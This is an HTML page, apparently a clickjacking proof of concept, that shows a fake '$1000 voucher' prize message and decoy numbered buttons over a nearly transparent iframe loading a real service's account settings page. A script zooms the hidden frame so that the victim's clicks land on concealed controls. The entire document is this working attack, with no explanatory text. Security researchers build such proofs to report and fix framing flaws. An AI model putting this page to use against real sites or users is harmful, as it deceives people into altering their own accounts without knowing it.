<!DOCTYPE html>
<html>
<head>
	<title>Copy Voucher Code to Clipboard</title>
	<style>
		iframe {
			position: relative;
			width: 100%;
			opacity: 0.10;
			z-index: 2;
			border: none;
			overflow: hidden;
		}
		.iframe-container {
			position: relative;
			width: 100%;
			padding-bottom: 150%; /* Set the aspect ratio for the iframe (3:2) */
		}
		.iframe-content {
			position: absolute;
			top: 0;
			left: 0;
			width: 100%;
			height: 100%;
			transform: scale(0.35); /* Set the default zoom level */
			transform-origin: top left;
		}
		.zoomed-in {
			transform: scale(1); /* Set the zoom level for the button or desired area */
		}
		.firstClick, .secondClick, .thirdClick, .fourthClick, .fifthClick, .sixthClick, .sevenClick, h1 {
			position: absolute;
			top: 330px;
			z-index: 1;
		}
		.firstClick {
			left: 482px;
			top: 593px;
		}
		.secondClick {
			left: 483px;
			top: 647px;
		}
		.thirdClick {
			left: 937px;
			top: 366px;
		}
		.fourthClick {
			left: 960px;
			top: 509px;
		}
		.fifthClick {
			left: 993px;
			top: 619px;
        }
		.sixthClick {
			left: 678px;
			top: 212px;
	    }
		.sevenClick {
			left: 716px;
			top: 440px;
		}
		h1 {
			left: 218px;
			top: 143px;
		}
	</style>
</head>
<body>
	<h1>Congrats You Won $1000 Voucher Follow the step & claim voucher Click on 1 Then 2 </h1>
	<button class="firstClick">1</button>
	<button class="secondClick">2</button>
	
        
	<div class="iframe-container">
		<iframe src="https://dash.bunny.net/account/settings" class="iframe-content"></iframe>
	</div>

	<script>
		document.addEventListener('DOMContentLoaded', function() {
			var button = document.querySelector('.firstClick'); // Replace '.firstClick' with the appropriate selector for your desired button or area
			button.addEventListener('click', function() {
				document.querySelector('.iframe-content').classList.add('zoomed-in');
			});
		});
	</script>
</body>
</html>
